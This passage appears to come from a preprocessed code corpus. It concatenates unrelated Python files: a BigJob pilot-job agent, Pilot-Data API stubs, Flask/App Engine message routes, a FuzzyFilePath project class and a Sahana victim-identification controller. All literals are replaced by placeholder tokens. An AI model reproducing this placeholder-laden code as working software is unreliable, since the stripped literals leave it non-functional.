<NUM_LIT:0> : <EOL> time . sleep ( <NUM_LIT:3> ) <EOL> continue <EOL> logging . debug ( "<STR_LIT>" + self . base_url ) <EOL> job_url = self . coordination . dequeue_job ( self . base_url ) <EOL> if job_url == None : <EOL> time . sleep ( <NUM_LIT:3> ) <EOL> continue <EOL> if job_url == "<STR_LIT>" : <EOL> break <EOL> job_counter = job_counter + <NUM_LIT:1> <EOL> if ( job_counter % ( THREAD_POOL_SIZE ) ) == <NUM_LIT:0> : <EOL> self . threadpool . wait ( ) <EOL> request = WorkRequest ( self . start_new_job_in_thread , [ job_url ] ) <EOL> self . threadpool . putRequest ( request ) <EOL> self . threadpool . wait ( ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> def start_new_job_in_thread ( self , job_url ) : <EOL> """<STR_LIT>""" <EOL> if job_url != None : <EOL> failed = False ; <EOL> try : <EOL> job_dict = self . coordination . get_job ( job_url ) <EOL> except : <EOL> failed = True <EOL> if job_dict == None or failed == True : <EOL> self . coordination . queue_job ( self . pilot_url , job_url ) <EOL> logging . debug ( "<STR_LIT>" + job_url + "<STR_LIT>" + str ( job_dict ) ) <EOL> if ( job_dict [ "<STR_LIT:state>" ] == str ( bigjob . state . Unknown ) ) : <EOL> job_dict [ "<STR_LIT:state>" ] = str ( bigjob . state . New ) <EOL> self . coordination . set_job_state ( job_url , str ( bigjob . state . New ) ) <EOL> self . execute_job ( job_url , job_dict ) <EOL> def monitor_jobs ( self ) : <EOL> """<STR_LIT>""" <EOL> logging . debug ( "<STR_LIT>" % len ( self . jobs ) ) <EOL> for i in self . jobs : <EOL> if self . processes . has_key ( i ) : <EOL> p = self . processes [ i ] <EOL> p_state = p . poll ( ) <EOL> logging . debug ( self . print_job ( i ) + "<STR_LIT>" + str ( p_state ) + "<STR_LIT>" + str ( p . returncode ) ) <EOL> if ( p_state != None and ( p_state == <NUM_LIT:0> or p_state == <NUM_LIT:255> ) ) : <EOL> logging . debug ( "<STR_LIT>" + self . print_job ( i ) ) <EOL> self . coordination . set_job_state ( i , str ( bigjob . state . Done ) ) <EOL> self . free_nodes ( i ) <EOL> del self . processes [ i ] <EOL> elif p_state != <NUM_LIT:0> and p_state != <NUM_LIT:255> and p_state != None : <EOL> logging . debug ( self . print_job ( i ) + "<STR_LIT>" ) <EOL> logging . debug ( "<STR_LIT>" + self . print_job ( i ) ) <EOL> self . coordination . set_job_state ( i , str ( bigjob . state . Failed ) ) <EOL> self . free_nodes ( i ) <EOL> del self . processes [ i ] <EOL> def print_job ( self , job_url ) : <EOL> job_dict = self . coordination . get_job ( job_url ) <EOL> return ( "<STR_LIT>" + job_url <EOL> + "<STR_LIT>" + job_dict [ "<STR_LIT>" ] ) <EOL> def start_background_thread ( self ) : <EOL> self . stop = False <EOL> logging . debug ( "<STR_LIT>" ) <EOL> logging . debug ( "<STR_LIT>" + str ( len ( self . freenodes ) ) + "<STR_LIT>" + str ( len ( self . busynodes ) ) ) <EOL> while True and self . stop == False : <EOL> if self . is_stopped ( self . base_url ) == True : <EOL> logging . debug ( "<STR_LIT>" ) <EOL> break <EOL> else : <EOL> logging . debug ( "<STR_LIT>" + str ( self . base_url ) + "<STR_LIT>" ) <EOL> try : <EOL> self . monitor_jobs ( ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> self . failed_polls = <NUM_LIT:0> <EOL> except : <EOL> traceback . print_exc ( file = sys . stdout ) <EOL> self . failed_polls = self . failed_polls + <NUM_LIT:1> <EOL> if self . failed_polls > <NUM_LIT:3> : <EOL> break <EOL> logging . debug ( "<STR_LIT>" ) <EOL> def is_stopped ( self , base_url ) : <EOL> state = None <EOL> try : <EOL> state = self . coordination . get_pilot_state ( base_url ) <EOL> except : <EOL> pass <EOL> logging . debug ( "<STR_LIT>" + str ( state ) ) <EOL> if state == None or state . has_key ( "<STR_LIT>" ) == False or state [ "<STR_LIT>" ] == True : <EOL> return True <EOL> else : <EOL> return False <EOL> def stop_background_thread ( self ) : <EOL> self . stop = True <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> args = sys . argv <EOL> num_args = len ( args ) <EOL> if ( num_args != <NUM_LIT:3> ) : <EOL> print "<STR_LIT>" + args [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> bigjob_agent = bigjob_agent ( args ) </s>
<s> import sys <EOL> import os <EOL> import time <EOL> import logging <EOL> import json <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) ) <EOL> from pilot import PilotDataService , ComputeDataService , DataUnit , State <EOL> COORDINATION_URL = "<STR_LIT>" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> if len ( sys . argv ) == <NUM_LIT:2> : <EOL> reconnect_url = sys . argv [ <NUM_LIT:1> ] <EOL> else : <EOL> print "<STR_LIT>" + sys . executable + "<STR_LIT:U+0020>" + __file__ + "<STR_LIT>" <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> pilot_data_service = PilotDataService ( coordination_url = COORDINATION_URL ) <EOL> pd_new = pilot_data_service . create_pilot ( { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:size>' : <NUM_LIT:100> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } ) <EOL> logging . debug ( "<STR_LIT>" % pilot_data_service . url ) <EOL> logging . debug ( "<STR_LIT>" % reconnect_url ) <EOL> pd = DataUnit ( du_url = reconnect_url ) <EOL> pd . add_pilot_data ( pd_new ) </s>
<s> """<STR_LIT>""" <EOL> class PilotDataDescription ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __setattr__ ( self , attr , value ) : <EOL> self [ attr ] = value <EOL> def __getattr__ ( self , attr ) : <EOL> return self [ attr ] <EOL> class PilotData ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT:description>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:state>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> def __init__ ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_state ( self ) : <EOL> pass <EOL> class PilotDataService ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT:state>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def __init__ ( self , pss_id = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def create_pilot ( self , pilot_data_description ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def list_pilots ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DataUnitService ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , pds_id = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def add_pilot_data_service ( self , pss ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def remove_pilot_data_service ( self , pss ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def list_pilot_data ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def submit_pilot_data_set ( self , data_unit_description ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_state ( self ) : <EOL> pass <EOL> def get_id ( self ) : <EOL> pass <EOL> class DataUnitDescription ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __setattr__ ( self , attr , value ) : <EOL> self [ attr ] = value <EOL> def __getattr__ ( self , attr ) : <EOL> return self [ attr ] <EOL> class DataUnit ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT:description>' , <EOL> '<STR_LIT:state>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def get_state ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def wait ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def export ( self , target_directory ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import time <EOL> import pdb <EOL> import sys <EOL> """<STR_LIT>""" <EOL> COORDINATION_URL = "<STR_LIT>" <EOL> sys . path . insert ( <NUM_LIT:0> , os . getcwd ( ) + "<STR_LIT>" ) <EOL> from bigjob import bigjob , subjob , description <EOL> def main ( ) : <EOL> queue = None <EOL> project = None <EOL> walltime = <NUM_LIT:10> <EOL> processes_per_node = <NUM_LIT:12> <EOL> number_of_processes = <NUM_LIT:12> <EOL> workingdirectory = os . path . join ( os . getcwd ( ) , "<STR_LIT>" ) <EOL> userproxy = None <EOL> """<STR_LIT>""" <EOL> lrms_url = "<STR_LIT>" <EOL> print "<STR_LIT>" + lrms_url <EOL> bj = bigjob ( COORDINATION_URL ) <EOL> bj . start_pilot_job ( lrms_url , <EOL> number_of_processes , <EOL> queue , <EOL> project , <EOL> workingdirectory , <EOL> userproxy , <EOL> walltime , <EOL> processes_per_node ) <EOL> print "<STR_LIT>" + bj . pilot_url + "<STR_LIT>" + str ( bj . get_state ( ) ) <EOL> jd = description ( ) <EOL> jd . executable = "<STR_LIT>" <EOL> jd . number_of_processes = "<STR_LIT:1>" <EOL> jd . spmd_variation = "<STR_LIT>" <EOL> jd . arguments = [ "<STR_LIT>" ] <EOL> jd . output = "<STR_LIT>" <EOL> jd . error = "<STR_LIT>" <EOL> sj = subjob ( ) <EOL> sj . submit_job ( bj . pilot_url , jd ) <EOL> while <NUM_LIT:1> : <EOL> state = str ( sj . get_state ( ) ) <EOL> print "<STR_LIT>" + state <EOL> if ( state == "<STR_LIT>" or state == "<STR_LIT>" ) : <EOL> break <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> bj . cancel ( ) <EOL> """<STR_LIT>""" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import copy <EOL> __author__ = '<STR_LIT>' <EOL> from flask import Blueprint <EOL> import json <EOL> from GithubAPI . GithubAPI import GitHubAPI_Keys <EOL> from google . appengine . ext import db <EOL> import requests <EOL> import datetime <EOL> from operator import itemgetter <EOL> from flask import Flask , request , render_template , redirect , abort , Response <EOL> from flask . ext . github import GitHub <EOL> from flask . ext . cors import CORS , cross_origin <EOL> from flask . ext . autodoc import Autodoc <EOL> from models . Course import Course <EOL> from models . Project import Project <EOL> from models . Message import Message <EOL> from SE_API . Validation_Utils import * <EOL> from SE_API . Respones_Utils import * <EOL> message_routes = Blueprint ( "<STR_LIT>" , __name__ ) <EOL> auto = Autodoc ( ) <EOL> @ message_routes . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ auto . doc ( ) <EOL> def createMessage ( token ) : <EOL> """<STR_LIT>""" <EOL> if not request . data : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> user = get_user_by_token ( token ) <EOL> try : <EOL> payload = json . loads ( request . data ) <EOL> except Exception as e : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> try : <EOL> msg = Message ( groupId = payload [ '<STR_LIT>' ] , message = payload [ '<STR_LIT:message>' ] , msgDate = datetime . datetime . now ( ) , master_id = user . key ( ) . id ( ) ) <EOL> except Exception as e : <EOL> print e <EOL> return bad_request ( "<STR_LIT>" ) <EOL> try : <EOL> msg . isProject = payload [ '<STR_LIT>' ] <EOL> except Exception as e : <EOL> pass <EOL> db . put ( msg ) <EOL> db . save <EOL> return Response ( response = msg . to_JSON ( ) , <EOL> status = <NUM_LIT:200> , <EOL> mimetype = "<STR_LIT:application/json>" ) <EOL> @ message_routes . route ( '<STR_LIT>' , methods = [ "<STR_LIT:GET>" ] ) <EOL> @ auto . doc ( ) <EOL> def getMessagesByGroup ( token , groupId ) : <EOL> """<STR_LIT>""" <EOL> if get_user_by_token ( token ) is None : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> arr = [ ] <EOL> query = Message . all ( ) <EOL> try : <EOL> query . filter ( "<STR_LIT>" , int ( groupId ) ) <EOL> except Exception as e : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> for m in query . run ( ) : <EOL> msgDic = dict ( json . loads ( m . to_JSON ( ) ) ) <EOL> msgTime = datetime . datetime ( msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] ) <EOL> msgDic [ '<STR_LIT>' ] = msgTime <EOL> arr . append ( msgDic ) <EOL> print arr <EOL> arr = sorted ( arr , key = itemgetter ( '<STR_LIT>' ) , reverse = True ) <EOL> for i in arr : <EOL> del i [ '<STR_LIT>' ] <EOL> print arr <EOL> if len ( arr ) != <NUM_LIT:0> : <EOL> return Response ( response = json . dumps ( arr ) , <EOL> status = <NUM_LIT:200> , <EOL> mimetype = "<STR_LIT:application/json>" ) <EOL> else : <EOL> return Response ( response = [ ] , <EOL> status = <NUM_LIT:200> , <EOL> mimetype = "<STR_LIT:application/json>" ) <EOL> @ message_routes . route ( '<STR_LIT>' , methods = [ "<STR_LIT:GET>" ] ) <EOL> @ auto . doc ( ) <EOL> def getAllUserMessages ( token ) : <EOL> """<STR_LIT>""" <EOL> user = get_user_by_token ( token ) <EOL> if user is None : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> arr = [ ] <EOL> allMsgs = Message . all ( ) <EOL> projectMsgs = copy . deepcopy ( allMsgs ) <EOL> projectMsgs . filter ( '<STR_LIT>' , False ) <EOL> for m in projectMsgs . run ( ) : <EOL> if str ( m . groupId ) in user . courses_id_list : <EOL> msgDic = dict ( json . loads ( m . to_JSON ( ) ) ) <EOL> msgTime = datetime . datetime ( msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] ) <EOL> msgDic [ '<STR_LIT>' ] = msgTime <EOL> arr . append ( msgDic ) <EOL> allMsgs . filter ( '<STR_LIT>' , True ) <EOL> for m in allMsgs . run ( ) : <EOL> if str ( m . groupId ) in user . projects_id_list : <EOL> msgDic = dict ( json . loads ( m . to_JSON ( ) ) ) <EOL> msgTime = datetime . datetime ( msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] , msgDic [ '<STR_LIT:date>' ] [ '<STR_LIT>' ] ) <EOL> msgDic [ '<STR_LIT>' ] = msgTime <EOL> arr . append ( msgDic ) <EOL> arr = sorted ( arr , key = itemgetter ( '<STR_LIT>' ) , reverse = True ) <EOL> for i in arr : <EOL> del i [ '<STR_LIT>' ] <EOL> print arr <EOL> if len ( arr ) != <NUM_LIT:0> : <EOL> return Response ( response = json . dumps ( arr ) , <EOL> status = <NUM_LIT:200> , <EOL> mimetype = "<STR_LIT:application/json>" ) <EOL> else : <EOL> return Response ( response = [ ] , <EOL> status = <NUM_LIT:200> , <EOL> mimetype = "<STR_LIT:application/json>" ) <EOL> @ message_routes . route ( '<STR_LIT>' , methods = [ "<STR_LIT>" ] ) <EOL> @ auto . doc ( ) <EOL> def deleteMessage ( token , msgId ) : <EOL> """<STR_LIT>""" <EOL> user = get_user_by_token ( token ) <EOL> if user is None : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> try : <EOL> msg = Message . get_by_id ( int ( msgId ) ) <EOL> except Exception as e : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> if msg is None : <EOL> return bad_request ( "<STR_LIT>" ) <EOL> if msg . master_id != user . key ( ) . id ( ) : <EOL> return forbidden ( "<STR_LIT>" ) <EOL> db . delete ( msg ) <EOL> db . save <EOL> return no_content ( ) <EOL> @ message_routes . route ( '<STR_LIT>' ) <EOL> def documentation ( ) : <EOL> return auto . html ( ) </s>
<s> import json <EOL> __author__ = '<STR_LIT>' <EOL> from google . appengine . ext import db <EOL> class Course ( db . Model ) : <EOL> courseName = db . StringProperty ( required = True ) <EOL> campusId = db . IntegerProperty ( required = True ) <EOL> master_id = db . IntegerProperty ( required = True ) <EOL> startDate = db . DateProperty ( required = True ) <EOL> endDate = db . DateProperty ( required = True ) <EOL> membersId = db . StringListProperty ( required = True ) <EOL> def to_JSON ( self ) : <EOL> data = { '<STR_LIT>' : self . courseName , <EOL> '<STR_LIT>' : self . campusId , <EOL> '<STR_LIT>' : self . master_id , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : self . startDate . year , <EOL> '<STR_LIT>' : self . startDate . month , <EOL> '<STR_LIT>' : self . startDate . day , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : self . endDate . year , <EOL> '<STR_LIT>' : self . endDate . month , <EOL> '<STR_LIT>' : self . endDate . day , <EOL> } , <EOL> '<STR_LIT>' : self . membersId , <EOL> '<STR_LIT:id>' : self . key ( ) . id ( ) <EOL> } <EOL> return json . dumps ( data ) </s>
<s> import os <EOL> import copy <EOL> from FuzzyFilePath . project . FileCache import FileCache <EOL> import FuzzyFilePath . project . validate as Validate <EOL> import FuzzyFilePath . common . path as Path <EOL> import FuzzyFilePath . common . settings as Settings <EOL> from FuzzyFilePath . common . verbose import warn <EOL> from FuzzyFilePath . common . verbose import verbose <EOL> ID = "<STR_LIT>" <EOL> class Project ( ) : <EOL> filecache = None <EOL> def __init__ ( self , window , directory , project_settings , ffp_settings ) : <EOL> """<STR_LIT>""" <EOL> self . window = window <EOL> self . directory = directory <EOL> self . update_settings ( ffp_settings , project_settings ) <EOL> def update_settings ( self , global_settings , project_settings ) : <EOL> settings = copy . deepcopy ( global_settings ) <EOL> Settings . merge ( settings , project_settings ) <EOL> self . settings = settings <EOL> self . evaluate_settings ( ) <EOL> def evaluate_settings ( self ) : <EOL> project_directory = os . path . join ( self . directory , self . get_setting ( "<STR_LIT>" ) ) <EOL> if os . path . exists ( project_directory ) : <EOL> self . project_directory = Path . posix ( project_directory ) <EOL> else : <EOL> self . project_directory = Path . posix ( self . directory ) <EOL> warn ( ID , "<STR_LIT>" ) <EOL> triggers = self . settings . get ( "<STR_LIT>" , self . get_setting ( "<STR_LIT>" ) ) <EOL> valid_file_extensions = get_valid_extensions ( triggers ) <EOL> folders_to_exclude = self . get_setting ( "<STR_LIT>" ) <EOL> self . filecache = FileCache ( valid_file_extensions , folders_to_exclude , self . project_directory ) <EOL> self . base_directory = Validate . sanitize_base_directory ( <EOL> self . settings . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> self . project_directory , <EOL> self . directory <EOL> ) <EOL> verbose ( ID , "<STR_LIT>" , self . project_directory ) <EOL> verbose ( ID , "<STR_LIT>" , "<STR_LIT:'>" + self . base_directory + "<STR_LIT:'>" ) <EOL> def get_directory ( self ) : <EOL> return self . project_directory <EOL> def get_base_directory ( self ) : <EOL> return self . base_directory <EOL> def get_setting ( self , key , default = None ) : <EOL> return self . settings . get ( key , default ) <EOL> def get_settings ( self ) : <EOL> return self . settings <EOL> def set_setting ( self , key , value ) : <EOL> data = self . window . get_project_data ( ) <EOL> settings = data . get ( "<STR_LIT>" ) . get ( "<STR_LIT>" ) <EOL> settings [ key ] = value <EOL> self . window . set_project_data ( data ) <EOL> self . settings [ key ] = value <EOL> def rebuild_filecache ( self ) : <EOL> verbose ( ID , "<STR_LIT>" , self . project_directory ) <EOL> return self . filecache . rebuild ( ) <EOL> def search_completions ( self , needle , project_folder , valid_extensions , base_path = False ) : <EOL> return self . filecache . search_completions ( needle , project_folder , valid_extensions , base_path ) <EOL> def find_file ( self , file_name ) : <EOL> return self . filecache . find_file ( file_name ) <EOL> def get_valid_extensions ( triggers ) : <EOL> """<STR_LIT>""" <EOL> extensionsToSuggest = [ ] <EOL> for scope in triggers : <EOL> ext = scope . get ( "<STR_LIT>" , [ ] ) <EOL> extensionsToSuggest += ext <EOL> return list ( set ( extensionsToSuggest ) ) </s>
<s> """<STR_LIT>""" <EOL> module = request . controller <EOL> resourcename = request . function <EOL> if not settings . has_module ( module ) : <EOL> raise HTTP ( <NUM_LIT> , body = "<STR_LIT>" % module ) <EOL> def s3_menu_postp ( ) : <EOL> menu_selected = [ ] <EOL> body_id = s3base . s3_get_last_record_id ( "<STR_LIT>" ) <EOL> if body_id : <EOL> body = s3db . dvi_body <EOL> query = ( body . id == body_id ) <EOL> record = db ( query ) . select ( body . id , body . pe_label , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> if record : <EOL> label = record . pe_label <EOL> response . menu_options [ - <NUM_LIT:3> ] [ - <NUM_LIT:1> ] . append ( <EOL> [ T ( "<STR_LIT>" ) % dict ( label = label ) , <EOL> False , URL ( f = "<STR_LIT>" , <EOL> vars = dict ( match = record . id ) ) ] <EOL> ) <EOL> menu_selected . append ( <EOL> [ "<STR_LIT>" % ( T ( "<STR_LIT>" ) , label ) , <EOL> False , URL ( f = "<STR_LIT:body>" , args = [ record . id ] ) ] <EOL> ) <EOL> person_id = s3base . s3_get_last_record_id ( "<STR_LIT>" ) <EOL> if person_id : <EOL> person = s3db . pr_person <EOL> query = ( person . id == person_id ) <EOL> record = db ( query ) . select ( person . id , limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> if record : <EOL> name = s3db . pr_person_id ( ) . represent ( record . id ) <EOL> menu_selected . append ( <EOL> [ "<STR_LIT>" % ( T ( "<STR_LIT>" ) , name ) , <EOL> False , URL ( f = "<STR_LIT>" , args = [ record . id ] ) ] <EOL> ) <EOL> if menu_selected : <EOL> menu_selected = [ T ( "<STR_LIT>" ) , True , None , menu_selected ] <EOL> response . menu_options . append ( menu_selected ) <EOL> def index ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> module_name = settings . modules [ module ] . name_nice <EOL> except : <EOL> module_name = T ( "<STR_LIT>" ) <EOL> btable = s3db . dvi_body <EOL> itable = s3db . dvi_identification <EOL> query = ( btable . deleted == False ) <EOL> left = itable . on ( itable . pe_id == btable . pe_id ) <EOL> body_count = btable . id . count ( ) <EOL> rows = db ( query ) . select ( body_count , <EOL> itable . status , <EOL> left = left , <EOL> groupby = itable . status ) <EOL> numbers = { None : <NUM_LIT:0> } <EOL> for row in rows : <EOL> numbers [ row [ itable . status ] ] = row [ body_count ] <EOL> total = sum ( numbers . values ( ) ) <EOL> dvi_id_status = dict ( s3db . dvi_id_status ) <EOL> dvi_id_status [ None ] = T ( "<STR_LIT>" ) <EOL> statistics = [ ] <EOL> for status in dvi_id_status : <EOL> count = numbers . get ( status ) or <NUM_LIT:0> <EOL> statistics . append ( ( str ( dvi_id_status [ status ] ) , count ) ) <EOL> response . title = module_name <EOL> return dict ( module_name = module_name , <EOL> total = total , <EOL> status = json . dumps ( statistics ) ) <EOL> def recreq ( ) : <EOL> """<STR_LIT>""" <EOL> table = s3db . dvi_recreq <EOL> table . person_id . default = s3_logged_in_person ( ) <EOL> def prep ( r ) : <EOL> if r . interactive and not r . record : <EOL> table . status . readable = False <EOL> table . status . writable = False <EOL> table . bodies_recovered . readable = False <EOL> table . bodies_recovered . writable = False <EOL> return True <EOL> s3 . prep = prep <EOL> output = s3_rest_controller ( ) <EOL> return output <EOL> def morgue ( ) : <EOL> """<STR_LIT>""" <EOL> morgue_tabs = [ ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT:body>" ) , <EOL> ] <EOL> rheader = S3ResourceHeader ( [ [ ( T ( "<STR_LIT>" ) , "<STR_LIT:name>" ) ] <EOL> ] , tabs = morgue_tabs ) <EOL> def prep ( r ) : <EOL> s3db . gis_location_filter ( r ) <EOL> if r . interactive and r . id and not r . component : <EOL> field = r . table . obsolete <EOL> field . readable = field . writable = True <EOL> return True <EOL> s3 . prep = prep <EOL> output = s3_rest_controller ( rheader = rheader ) <EOL> return output <EOL> def body ( ) : <EOL> """<STR_LIT>""" <EOL> gender_opts = s3db . pr_gender_opts <EOL> gender_opts [ <NUM_LIT:1> ] = T ( "<STR_LIT>" ) <EOL> ntable = s3db . pr_note <EOL> ntable . status . readable = False <EOL> ntable . status . writable = False <EOL> dvi_tabs = [ ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT:image>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ] <EOL> rheader = S3ResourceHeader ( [ [ ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) ] , <EOL> [ "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" ] , <EOL> ] , <EOL> tabs = dvi_tabs ) <EOL> return s3_rest_controller ( rheader = rheader ) <EOL> def person ( ) : <EOL> """<STR_LIT>""" <EOL> table = s3db . pr_person <EOL> s3 . crud_strings [ "<STR_LIT>" ] . update ( <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) , <EOL> msg_no_match = T ( "<STR_LIT>" ) ) <EOL> s3db . configure ( "<STR_LIT>" , <EOL> list_fields = [ "<STR_LIT:id>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> ) <EOL> s3db . configure ( "<STR_LIT>" , <EOL> deletable = False , <EOL> editable = False , <EOL> listadd = False , <EOL> list_fields = [ "<STR_LIT:id>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> ) <EOL> def prep ( r ) : <EOL> if not r . id and not r . method and not r . component : <EOL> body_id = r . get_vars . get ( "<STR_LIT>" , None ) <EOL> body = db ( db . dvi_body . id == body_id ) . select ( <EOL> db . dvi_body . pe_label , limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> label = body and body . pe_label or "<STR_LIT>" % body_id <EOL> if body_id : <EOL> query = dvi_match_query ( body_id ) <EOL> r . resource . add_filter ( query ) <EOL> s3 . crud_strings [ "<STR_LIT>" ] . update ( <EOL> msg_no_match = T ( "<STR_LIT>" ) ) <EOL> return True <EOL> s3 . prep = prep <EOL> field = table . missing <EOL> field . readable = False <EOL> field . writable = False <EOL> field . default = True <EOL> table . age_group . readable = True <EOL> table . age_group . writable = True <EOL> if len ( request . args ) == <NUM_LIT:0> : <EOL> s3 . filter = ( db . pr_person . missing == True ) <EOL> mpr_tabs = [ ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , None ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT:image>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT:address>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ] <EOL> rheader = lambda r : s3db . pr_rheader ( r , tabs = mpr_tabs ) <EOL> output = s3_rest_controller ( "<STR_LIT>" , "<STR_LIT>" , <EOL> main = "<STR_LIT>" , <EOL> extra = "<STR_LIT>" , <EOL> rheader = rheader , <EOL> ) <EOL> return output <EOL> def dvi_match_query ( body_id ) : <EOL> """<STR_LIT>""" <EOL> ptable = s3db . pr_person <EOL> ntable = s3db . pr_note <EOL> btable = s3db . dvi_body <EOL> query = ( ( ptable . deleted == False ) & <EOL> ( ptable . missing == True ) & <EOL> ( ntable . pe_id == ptable . pe_id ) & <EOL> ( ntable . status == <NUM_LIT:1> ) ) <EOL> body = btable [ body_id ] <EOL> if not body : <EOL> return query <EOL> if body . date_of_recovery : <EOL> q = ( ( ntable . timestmp <= body . date_of_recovery ) | <EOL> ( ntable . timestmp == None ) ) <EOL> query = query & q <EOL> if body . age_group and body . age_group != <NUM_LIT:1> : <EOL> q = ( ( ptable . age_group == None ) | <EOL> ( ptable . age_group == <NUM_LIT:1> ) | <EOL> ( ptable . age_group == body . age_group ) ) <EOL> query = query & q <EOL> if body . gender and body . gender != <NUM_LIT:1> : <EOL> q = ( ( ptable . gender == None ) | <EOL> ( ptable . gender == <NUM_LIT:1> ) | <EOL> ( ptable . gender == body . gender ) 